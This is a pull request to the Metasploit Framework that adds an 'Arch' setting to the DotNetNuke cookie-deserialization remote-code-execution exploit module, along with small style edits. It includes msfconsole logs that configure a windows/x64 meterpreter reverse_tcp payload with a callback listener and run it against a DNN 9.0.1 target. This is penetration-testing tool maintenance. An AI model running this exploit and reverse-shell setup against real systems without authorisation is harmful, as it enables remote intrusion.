### PR TITLE
Adding Arch parameter to dnn_cookie_deserialization_rce module

### DIFF
--- a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
+++ b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
@@ -228,11 +228,11 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if @encrypted
       # Requires either supplied key and IV, or verification code and plaintext
-      if (!key.blank? && !iv.blank?)
+      if !key.blank? && !iv.blank?
         @passphrase = key + iv
         # Key and IV were supplied, don't try and decrypt.
         @try_decrypt = false
-      elsif (!@verification_codes.empty? && !@kpt.blank?)
+      elsif !@verification_codes.empty? && !@kpt.blank?
         @try_decrypt = true
       else
         fail_with(Failure::BadConfig, 'You must provide either (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV).')

--- a/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
+++ b/modules/exploits/windows/http/dnn_cookie_deserialization_rce.rb
@@ -59,6 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://github.com/pwntester/ysoserial.net']
         ],
         'Platform' => 'win',
+        'Arch' => [ARCH_X86, ARCH_X64],
         'Targets' => [
           [ 'Automatic', { 'auto' => true } ],
           [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ],


### PR DESCRIPTION
Hi, 
Seems like for a recent update, the dnn_cookie_deserialization_rce metasploit's module needs `Arch` parameter to enable x64 payloads. 

# Test Env

```bash
┌──(fufu㉿salt)-[~]
└─$ msfconsole --version
Framework Version: 6.4.5-dev
```

Target : DNN v9.0.1

# Verification

Before : 
```bash
msf6 > use windows/http/dnn_cookie_deserialization_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOST 10.10.110.10
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set target 0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST tun0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 8080
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > run

[-] Exploit failed: windows/x64/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was created.
```

After the modification : 
```bash
msf6 > use windows/http/dnn_cookie_deserialization_rce
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set RHOST 10.10.110.10
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set target 0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LHOST tun0
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > set LPORT 8080
msf6 exploit(windows/http/dnn_cookie_deserialization_rce) > run

[*] Trying to determine DNN Version...
[!] DNN Version Found: v9.0.1 - v9.1.1 - May require ENCRYPTED
[*] Checking for custom error page at: /__ ...
[+] Custom error page detected.
[*] Sending Exploit Payload to: /__ ...
[*] Exploit completed, but no session was created.

```

![Screenshot_20240509_231343](https://github.com/rapid7/metasploit-framework/assets/49839857/85e09898-5a0a-4576-beaa-3fcd8713866e)
